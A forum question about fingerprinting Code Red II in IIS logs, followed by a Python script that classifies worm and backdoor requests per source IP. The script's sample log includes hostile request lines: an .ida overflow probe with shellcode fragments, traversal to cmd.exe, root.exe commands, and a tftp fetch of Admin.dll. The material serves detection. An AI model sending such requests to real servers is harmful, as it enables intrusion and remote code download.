Can anyone give me a FOR SURE logfile fingerprint on the *ENTIRETY* of the Code Red II worm??
I'm aware of the "default.ida" buffer overflow fingerprint, but I want to know whether any of the "root.exe" files are executed by default or if those must be exploited manually by a malicious user.
I have a fingerprint of several days of repeated attempts to compromise the system through various "root.exe" copies of the Command Shell. Also, I have logs of an effective compromise of "root.exe" and the installation of "admin.dll" and the replacement of "httpodbc.dll" via this backdoor.
I need to know whether to pursue the source of these attacks further or whether to chalk it up to a random-IP scan.
Please, no "only idiots get Code Red" comments; I'm just here to clean up someone else's mess. 🙂
Thanks!!
Eric
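The following is an added example, not code from the post or from any Code Red analysis, that scans IIS W3C extended log lines for the request patterns the post mentions and builds a per-source-IP summary. The two worm fingerprints it relies on are well documented: Code Red II's probe is a GET for /default.ida with a long run of "X" characters followed by %u-encoded shellcode (the original Code Red padded with "N"), and an infected host is left with cmd.exe copied to /scripts/root.exe and /MSADC/root.exe. The later requests for root.exe with "/c+dir", the Unicode and double-decode traversals to cmd.exe, and the "tftp ... GET Admin.dll" command are the automated propagation requests of Nimda, which uses the root.exe backdoor Code Red II leaves behind; they are not something Code Red II itself issues. The log lines below are constructed for the example (the X padding is shortened; the real probe is several hundred bytes), the field list follows the IIS 5.0 default, and the category names are this example's own. A root.exe or cmd.exe request logged with HTTP status 200 means IIS actually ran the command, which is the distinction the post is after when deciding between a passing scan and a hands-on intruder.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed IIS W3C extended log sample (not the poster's real logs).
# Fields follow the IIS 5.0 default layout.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-08-05 03:12:41 192.0.2.10 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 200
2001-09-18 14:02:07 198.51.100.7 GET /scripts/root.exe /c+dir 404
2001-09-18 14:02:08 198.51.100.7 GET /MSADC/root.exe /c+dir 404
2001-09-18 14:02:09 198.51.100.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:10 198.51.100.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp%20-i%20198.51.100.7%20GET%20Admin.dll%20d:\Admin.dll 200
2001-09-20 09:41:55 203.0.113.4 GET /scripts/root.exe /c+dir 200
2001-09-20 09:42:30 203.0.113.4 GET /scripts/root.exe /c+dir+c:\inetpub\scripts 200
2001-09-21 11:00:00 192.0.2.77 GET /index.htm - 200
"""

# Signatures (category names are this example's own, not a vendor taxonomy).
IDA_OVERFLOW = re.compile(r"^[XN]{16,}.*%u9090", re.I)       # Code Red / Code Red II .ida probe
ROOT_EXE = re.compile(r"^/(scripts|msadc)/root\.exe$", re.I)  # backdoor cmd.exe copy left by Code Red II
CMD_TRAVERSAL = re.compile(r"cmd\.exe$", re.I)                # Unicode / double-decode traversal to cmd.exe
TFTP_FETCH = re.compile(r"tftp", re.I)                        # Nimda pulls Admin.dll from the infecting host


@dataclass
class Request:
    date: str
    time: str
    ip: str
    method: str
    stem: str
    query: str
    status: int


def parse_w3c(text):
    """Parse W3C extended log text into Request records, using the #Fields: directive
    to locate columns. Lines that do not fit the declared field count are skipped."""
    fields = None
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue
        rec = dict(zip(fields, parts))
        try:
            records.append(Request(rec["date"], rec["time"], rec["c-ip"], rec["cs-method"],
                                   rec["cs-uri-stem"], rec["cs-uri-query"], int(rec["sc-status"])))
        except (KeyError, ValueError):
            continue
    return records


def classify(req):
    """Return the signature category for one request, or None if it is ordinary traffic."""
    if req.stem.lower() == "/default.ida" and IDA_OVERFLOW.search(req.query):
        return "ida_overflow"
    if ROOT_EXE.match(req.stem):
        return "root_exe_backdoor"
    if CMD_TRAVERSAL.search(req.stem):
        return "cmd_exe_traversal"
    return None


def summarize(text):
    """Per-source-IP summary: category counts, whether a backdoor command was actually
    executed (HTTP 200 on root.exe/cmd.exe), whether a TFTP fetch was attempted,
    and the first/last timestamp seen for that source."""
    report = {}
    for req in parse_w3c(text):
        cat = classify(req)
        if cat is None:
            continue
        entry = report.setdefault(req.ip, {"categories": Counter(), "backdoor_executed": False,
                                           "tftp_fetch": False, "first": None, "last": None})
        entry["categories"][cat] += 1
        ts = f"{req.date} {req.time}"
        entry["first"] = ts if entry["first"] is None else min(entry["first"], ts)
        entry["last"] = ts if entry["last"] is None else max(entry["last"], ts)
        # IIS returns 200 when it ran cmd.exe for the request; 404 means the file was not there.
        if cat in ("root_exe_backdoor", "cmd_exe_traversal") and req.status == 200:
            entry["backdoor_executed"] = True
        if cat != "ida_overflow" and TFTP_FETCH.search(req.query):
            entry["tftp_fetch"] = True
    return report


if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, dict(entry["categories"]), "executed" if entry["backdoor_executed"] else "failed",
              "tftp" if entry["tftp_fetch"] else "-", entry["first"], "..", entry["last"])
```

Run it against a real log by replacing SAMPLE_LOG with the file contents (ex010918.log and friends under %SystemRoot%\System32\LogFiles\W3SVC1). Sources that only ever show the default.ida probe, or root.exe requests that all returned 404 and a single tftp command, fit the automated worm traffic pattern; a source whose root.exe requests returned 200 and then issued commands other than the fixed "/c+dir" and "tftp ... Admin.dll" sequence is worth following up as a person rather than a worm.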